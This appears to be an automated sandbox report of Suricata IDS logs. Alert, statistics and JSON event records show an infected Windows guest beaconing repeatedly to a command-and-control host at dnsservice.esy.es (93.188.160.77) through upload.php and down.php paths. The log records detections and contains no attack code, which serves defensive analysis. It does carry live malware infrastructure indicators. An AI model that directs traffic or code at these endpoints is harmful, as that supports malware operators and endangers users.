16.038016  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1052 -> 93.188.160.77:80
16.229765  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1053 -> 93.188.160.77:80
16.441451  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1054 -> 93.188.160.77:80
16.656557  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1055 -> 93.188.160.77:80
16.846564  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1056 -> 93.188.160.77:80
17.038384  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1057 -> 93.188.160.77:80
17.233111  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1058 -> 93.188.160.77:80
17.456246  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1059 -> 93.188.160.77:80
17.678803  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1060 -> 93.188.160.77:80
17.902525  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1061 -> 93.188.160.77:80
18.099694  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1062 -> 93.188.160.77:80
18.314913  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1063 -> 93.188.160.77:80
18.527422  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1064 -> 93.188.160.77:80
18.714201  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1065 -> 93.188.160.77:80
18.932205  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1066 -> 93.188.160.77:80
19.125776  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1067 -> 93.188.160.77:80
19.337315  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1068 -> 93.188.160.77:80
19.558551  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1069 -> 93.188.160.77:80
19.756485  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1070 -> 93.188.160.77:80
19.970746  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1071 -> 93.188.160.77:80
20.162659  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1072 -> 93.188.160.77:80
20.355190  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1073 -> 93.188.160.77:80
20.566667  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1074 -> 93.188.160.77:80
20.796394  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1075 -> 93.188.160.77:80
21.005407  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1076 -> 93.188.160.77:80
21.201938  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1077 -> 93.188.160.77:80
21.414146  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1078 -> 93.188.160.77:80
21.646260  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1079 -> 93.188.160.77:80
21.863440  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1080 -> 93.188.160.77:80
22.078286  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1081 -> 93.188.160.77:80
22.289998  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1082 -> 93.188.160.77:80
22.479244  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1083 -> 93.188.160.77:80
22.677310  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1084 -> 93.188.160.77:80
22.889644  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1085 -> 93.188.160.77:80
23.110404  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1086 -> 93.188.160.77:80
23.301288  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1087 -> 93.188.160.77:80
23.496318  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1088 -> 93.188.160.77:80
23.708775  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1089 -> 93.188.160.77:80
23.902901  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1090 -> 93.188.160.77:80
24.110608  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1091 -> 93.188.160.77:80
24.296917  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1092 -> 93.188.160.77:80
24.505792  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1093 -> 93.188.160.77:80
24.718750  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1094 -> 93.188.160.77:80
24.908659  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1095 -> 93.188.160.77:80
25.121069  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1096 -> 93.188.160.77:80
25.312715  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1097 -> 93.188.160.77:80
25.505613  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1098 -> 93.188.160.77:80
25.705126  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1099 -> 93.188.160.77:80
25.898512  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1100 -> 93.188.160.77:80
26.094065  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1101 -> 93.188.160.77:80
26.309295  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1102 -> 93.188.160.77:80
26.503486  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1103 -> 93.188.160.77:80
26.719201  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1104 -> 93.188.160.77:80
26.911768  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1105 -> 93.188.160.77:80
27.120979  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1106 -> 93.188.160.77:80
27.314528  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1107 -> 93.188.160.77:80
27.522773  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1108 -> 93.188.160.77:80
27.709455  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1109 -> 93.188.160.77:80
27.906982  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1110 -> 93.188.160.77:80
28.098750  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1111 -> 93.188.160.77:80
28.291541  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1112 -> 93.188.160.77:80
28.482940  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1113 -> 93.188.160.77:80
28.694458  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1114 -> 93.188.160.77:80
28.906030  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1115 -> 93.188.160.77:80
29.094359  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1116 -> 93.188.160.77:80
29.304030  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1117 -> 93.188.160.77:80
29.519182  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1118 -> 93.188.160.77:80
29.713234  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1119 -> 93.188.160.77:80
29.906963  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1120 -> 93.188.160.77:80
30.123878  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1121 -> 93.188.160.77:80
30.317741  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1122 -> 93.188.160.77:80
30.537197  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1123 -> 93.188.160.77:80
30.729489  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1124 -> 93.188.160.77:80
30.949660  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1125 -> 93.188.160.77:80
31.164867  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1126 -> 93.188.160.77:80
31.365530  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1127 -> 93.188.160.77:80
31.571741  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1128 -> 93.188.160.77:80
31.786928  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1129 -> 93.188.160.77:80
31.998974  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1130 -> 93.188.160.77:80
32.187045  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1131 -> 93.188.160.77:80
32.395655  [**] [1:2012612:16] ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1132 -> 93.188.160.77:80
32.608119  [**] [1:2816614:3] ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:1133 -> 93.188.160.77:80
32.820730  [**] [1:2012612:16] E

This file has been truncated. Go here to download in full.


stats.log - (3081 bytes) - download
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
------------------------------------------------------------------------------------
Date: 8/13/2019 -- 12:11:13 (uptime: 0d, 00h 00m 01s)
------------------------------------------------------------------------------------
Counter                                    | TM Name                   | Value
------------------------------------------------------------------------------------
decoder.pkts                               | Total                     | 2993
decoder.bytes                              | Total                     | 326330
decoder.invalid                            | Total                     | 1
decoder.ipv4                               | Total                     | 2989
decoder.ethernet                           | Total                     | 2993
decoder.tcp                                | Total                     | 2899
decoder.udp                                | Total                     | 51
decoder.icmpv4                             | Total                     | 37
decoder.avg_pkt_size                       | Total                     | 109
decoder.max_pkt_size                       | Total                     | 590
flow.tcp                                   | Total                     | 323
flow.udp                                   | Total                     | 8
decoder.ethernet.pkt_too_small             | Total                     | 1
tcp.sessions                               | Total                     | 323
tcp.syn                                    | Total                     | 323
tcp.synack                                 | Total                     | 322
tcp.rst                                    | Total                     | 322
detect.alert                               | Total                     | 322
detect.mpm_list                            | Total                     | 14
detect.nonmpm_list                         | Total                     | 2
detect.match_list                          | Total                     | 15
app_layer.flow.http                        | Total                     | 322
app_layer.tx.http                          | Total                     | 322
app_layer.flow.dns_udp                     | Total                     | 1
app_layer.tx.dns_udp                       | Total                     | 2
app_layer.flow.failed_udp                  | Total                     | 7
flow.spare                                 | Total                     | 10000
flow_mgr.flows_checked                     | Total                     | 1
flow_mgr.flows_notimeout                   | Total                     | 1
flow_mgr.rows_checked                      | Total                     | 65536
flow_mgr.rows_skipped                      | Total                     | 65535
flow_mgr.rows_maxlen                       | Total                     | 1
tcp.memuse                                 | Total                     | 573440
tcp.reassembly_memuse                      | Total                     | 81920
flow.memuse                                | Total                     | 7079488


eve.json - (557595 bytes) - download
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
{"timestamp":"1900-01-00T00:00:10.531887+0000","flow_id":59315646504367,"pcap_cnt":10,"event_type":"dns","src_ip":"10.0.2.15","src_port":1031,"dest_ip":"10.0.2.2","dest_port":53,"proto":"UDP","dns":{"type":"query","id":54356,"rrname":"time.windows.com","rrtype":"A","tx_id":0}}
{"timestamp":"1900-01-00T00:00:10.532230+0000","flow_id":59315646504367,"pcap_cnt":11,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":54356,"rcode":"NOERROR","rrname":"time.windows.com","rrtype":"CNAME","ttl":1579,"rdata":"time.microsoft.akadns.net"}}
{"timestamp":"1900-01-00T00:00:10.532230+0000","flow_id":59315646504367,"pcap_cnt":11,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":54356,"rcode":"NOERROR","rrname":"time.microsoft.akadns.net","rrtype":"A","ttl":223,"rdata":"51.145.123.29"}}
{"timestamp":"1900-01-00T00:00:10.532230+0000","flow_id":59315646504367,"pcap_cnt":11,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":54356,"rcode":"NOERROR","rrname":"akadns.net","rrtype":"NS","ttl":36796,"rdata":"a13-130.akagtm.org"}}
{"timestamp":"1900-01-00T00:00:10.532230+0000","flow_id":59315646504367,"pcap_cnt":11,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":54356,"rcode":"NOERROR","rrname":"akadns.net","rrtype":"NS","ttl":36796,"rdata":"a11-129.akadns.net"}}
{"timestamp":"1900-01-00T00:00:10.532230+0000","flow_id":59315646504367,"pcap_cnt":11,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":54356,"rcode":"NOERROR","rrname":"akadns.net","rrtype":"NS","ttl":36796,"rdata":"a5-130.akagtm.org"}}
{"timestamp":"1900-01-00T00:00:10.532230+0000","flow_id":59315646504367,"pcap_cnt":11,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":54356,"rcode":"NOERROR","rrname":"akadns.net","rrtype":"NS","ttl":36796,"rdata":"a28-129.akagtm.org"}}
{"timestamp":"1900-01-00T00:00:10.532230+0000","flow_id":59315646504367,"pcap_cnt":11,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":54356,"rcode":"NOERROR","rrname":"akadns.net","rrtype":"NS","ttl":36796,"rdata":"a12-131.akagtm.org"}}
{"timestamp":"1900-01-00T00:00:10.532230+0000","flow_id":59315646504367,"pcap_cnt":11,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":54356,"rcode":"NOERROR","rrname":"akadns.net","rrtype":"NS","ttl":36796,"rdata":"a7-131.akadns.net"}}
{"timestamp":"1900-01-00T00:00:10.532230+0000","flow_id":59315646504367,"pcap_cnt":11,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":54356,"rcode":"NOERROR","rrname":"akadns.net","rrtype":"NS","ttl":36796,"rdata":"a9-128.akadns.net"}}
{"timestamp":"1900-01-00T00:00:10.532230+0000","flow_id":59315646504367,"pcap_cnt":11,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":54356,"rcode":"NOERROR","rrname":"akadns.net","rrtype":"NS","ttl":36796,"rdata":"a18-128.akagtm.org"}}
{"timestamp":"1900-01-00T00:00:10.532230+0000","flow_id":59315646504367,"pcap_cnt":11,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":54356,"rcode":"NOERROR","rrname":"akadns.net","rrtype":"NS","ttl":36796,"rdata":"a3-129.akadns.net"}}
{"timestamp":"1900-01-00T00:00:10.532230+0000","flow_id":59315646504367,"pcap_cnt":11,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":54356,"rcode":"NOERROR","rrname":"akadns.net","rrtype":"NS","ttl":36796,"rdata":"a1-128.akadns.net"}}
{"timestamp":"1900-01-00T00:00:15.055753+0000","flow_id":59315646504367,"pcap_cnt":30,"event_type":"dns","src_ip":"10.0.2.15","src_port":1031,"dest_ip":"10.0.2.2","dest_port":53,"proto":"UDP","dns":{"type":"query","id":8131,"rrname":"dnsservice.esy.es","rrtype":"A","tx_id":1}}
{"timestamp":"1900-01-00T00:00:15.218919+0000","flow_id":59315646504367,"pcap_cnt":33,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":8131,"rcode":"NOERROR","rrname":"dnsservice.esy.es","rrtype":"A","ttl":14400,"rdata":"93.188.160.77"}}
{"timestamp":"1900-01-00T00:00:15.218919+0000","flow_id":59315646504367,"pcap_cnt":33,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":8131,"rcode":"NOERROR","rrname":"esy.es","rrtype":"NS","ttl":16470,"rdata":"ns3.main-hosting.com"}}
{"timestamp":"1900-01-00T00:00:15.218919+0000","flow_id":59315646504367,"pcap_cnt":33,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":8131,"rcode":"NOERROR","rrname":"esy.es","rrtype":"NS","ttl":16470,"rdata":"ns4.main-hosting.com"}}
{"timestamp":"1900-01-00T00:00:15.218919+0000","flow_id":59315646504367,"pcap_cnt":33,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":8131,"rcode":"NOERROR","rrname":"esy.es","rrtype":"NS","ttl":16470,"rdata":"ns2.main-hosting.com"}}
{"timestamp":"1900-01-00T00:00:15.218919+0000","flow_id":59315646504367,"pcap_cnt":33,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":8131,"rcode":"NOERROR","rrname":"esy.es","rrtype":"NS","ttl":16470,"rdata":"ns1.main-hosting.com"}}
{"timestamp":"1900-01-00T00:00:15.415054+0000","flow_id":824751833440828,"pcap_cnt":41,"event_type":"alert","src_ip":"10.0.2.15","src_port":1049,"dest_ip":"93.188.160.77","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2816614,"rev":3,"signature":"ETPRO TROJAN OnionDog\/TrosmAgent CnC Beacon","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"1900-01-00T00:00:15.415054+0000","flow_id":824751833440828,"pcap_cnt":41,"event_type":"http","src_ip":"10.0.2.15","src_port":1049,"dest_ip":"93.188.160.77","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"dnsservice.esy.es","url":"\/.\/software1\/upload.php","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)","http_content_type":"text\/plain"}}
{"timestamp":"1900-01-00T00:00:15.415054+0000","flow_id":824751833440828,"pcap_cnt":41,"event_type":"fileinfo","src_ip":"10.0.2.15","src_port":1049,"dest_ip":"93.188.160.77","dest_port":80,"proto":"TCP","http":{"hostname":"dnsservice.esy.es","url":"\/.\/software1\/upload.php","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)","http_content_type":"text\/plain","http_method":"POST","protocol":"HTTP\/1.1","status":403,"length":35},"app_proto":"http","fileinfo":{"filename":"\/software1\/upload.php","gaps":false,"state":"CLOSED","stored":false,"size":54,"tx_id":0}}
{"timestamp":"1900-01-00T00:00:15.626881+0000","flow_id":1513140601707347,"pcap_cnt":50,"event_type":"alert","src_ip":"10.0.2.15","src_port":1050,"dest_ip":"93.188.160.77","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2012612,"rev":16,"signature":"ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"1900-01-00T00:00:15.626881+0000","flow_id":1513140601707347,"pcap_cnt":50,"event_type":"http","src_ip":"10.0.2.15","src_port":1050,"dest_ip":"93.188.160.77","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"dnsservice.esy.es","url":"\/.\/software1\/down.php?file=CQUGKAWELS","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)","http_content_type":"text\/plain"}}
{"timestamp":"1900-01-00T00:00:15.838390+0000","flow_id":1368602067309402,"pcap_cnt":59,"event_type":"alert","src_ip":"10.0.2.15","src_port":1051,"dest_ip":"93.188.160.77","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2816614,"rev":3,"signature":"ETPRO TROJAN OnionDog\/TrosmAgent CnC Beacon","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"1900-01-00T00:00:15.838390+0000","flow_id":1368602067309402,"pcap_cnt":59,"event_type":"http","src_ip":"10.0.2.15","src_port":1051,"dest_ip":"93.188.160.77","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"dnsservice.esy.es","url":"\/.\/software1\/upload.php","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)","http_content_type":"text\/plain"}}
